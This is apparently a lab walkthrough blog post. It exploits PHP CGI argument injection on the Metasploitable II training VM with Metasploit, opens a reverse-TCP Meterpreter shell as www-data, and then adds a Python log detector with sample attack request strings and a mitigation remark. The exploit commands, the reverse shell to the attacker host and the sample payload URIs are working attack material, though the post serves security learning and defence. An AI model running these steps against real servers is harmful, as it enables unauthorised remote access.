Thursday, February 6, 2020

Metasploitable II: PHP CGI Argument Injection

This version of the Apache web server is vulnerable because of the PHP version installed alongside it. You can see the vulnerable version information on the phpinfo page.

It's now time to exploit the vulnerability. Let's load up Metasploit and use the module exploit/multi/http/php_cgi_arg_injection against the remote host.

msf5 > use exploit/multi/http/php
use exploit/multi/http/php_cgi_arg_injection             use exploit/multi/http/phpmyadmin_3522_backdoor
use exploit/multi/http/php_utility_belt_rce              use exploit/multi/http/phpmyadmin_lfi_rce
use exploit/multi/http/php_volunteer_upload_exec         use exploit/multi/http/phpmyadmin_null_termination_exec
use exploit/multi/http/phpfilemanager_rce                use exploit/multi/http/phpmyadmin_preg_replace
use exploit/multi/http/phpldapadmin_query_engine         use exploit/multi/http/phpscheduleit_start_date
use exploit/multi/http/phpmailer_arg_injection           use exploit/multi/http/phptax_exec
use exploit/multi/http/phpmoadmin_exec                   use exploit/multi/http/phpwiki_ploticus_exec
msf5 > use exploit/multi/http/php_cgi_arg_injection
msf5 exploit(multi/http/php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLESK        false            yes       Exploit Plesk
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
   URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
   VHOST                         no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/php_cgi_arg_injection) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:48979) at 2020-02-07 00:32:29 -0700

meterpreter > shell
Process 5437 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

As you can see we got a shell on the remote host.
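On the defensive side, this class of request is easy to spot in the Apache access log: php-cgi only treats the query string as command-line arguments when it contains no literal "=", so a dash-prefixed token (possibly percent-encoded, which is what the module's URIENCODING option plays with) in such a query string is the signature. The following detector is an added example, not code from the original post or from Metasploit; the log lines and the rule that only ".php" paths are considered CGI-handled are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Apache combined-log format (constructed sample lines below, not from the original post).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d+)'
)

# Constructed sample log: two requests whose query string would be parsed as
# php-cgi options, and two benign ones (a '=' in the query, and a non-PHP path).
SAMPLE_LOG = [
    '192.168.56.1 - - [07/Feb/2020:00:32:29 -0700] "GET /index.php?%2ds HTTP/1.1" 200 512',
    '192.168.56.1 - - [07/Feb/2020:00:32:30 -0700] "POST /index.php?-d+display_errors%3d1 HTTP/1.1" 200 38288',
    '10.0.0.5 - - [07/Feb/2020:00:33:01 -0700] "GET /index.php?page=-s HTTP/1.1" 200 1024',
    '10.0.0.5 - - [07/Feb/2020:00:33:02 -0700] "GET /search?-x HTTP/1.1" 404 200',
]


def query_is_php_cgi_args(raw_query: str) -> bool:
    """True if php-cgi would receive this raw query string as command-line arguments.

    The CGI handling rule: a query string with no literal '=' is split on '+',
    percent-decoded, and passed as argv, so any token that decodes to a leading
    '-' becomes an interpreter option. A percent-encoded '=' (%3d) does not
    count as a literal '=', which is why we test the raw, undecoded string.
    """
    if raw_query == "" or "=" in raw_query:
        return False
    # unquote() decodes %XX but leaves '+' alone, matching how the server splits args.
    return any(unquote(token).startswith("-") for token in raw_query.split("+"))


def flag_requests(log_lines):
    """Return (client_ip, request_uri) for each request that would be parsed as php-cgi options.

    Assumption: only paths ending in '.php' are handled by php-cgi on this server.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        uri = m.group("uri")
        path, _, query = uri.partition("?")
        if path.endswith(".php") and query_is_php_cgi_args(query):
            hits.append((m.group("ip"), uri))
    return hits


if __name__ == "__main__":
    for ip, uri in flag_requests(SAMPLE_LOG):
        print(f"php-cgi argument injection attempt from {ip}: {uri}")
```

The same rule, expressed as a rewrite condition on the raw query string, is how the upstream mitigation blocks these requests before they reach php-cgi.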
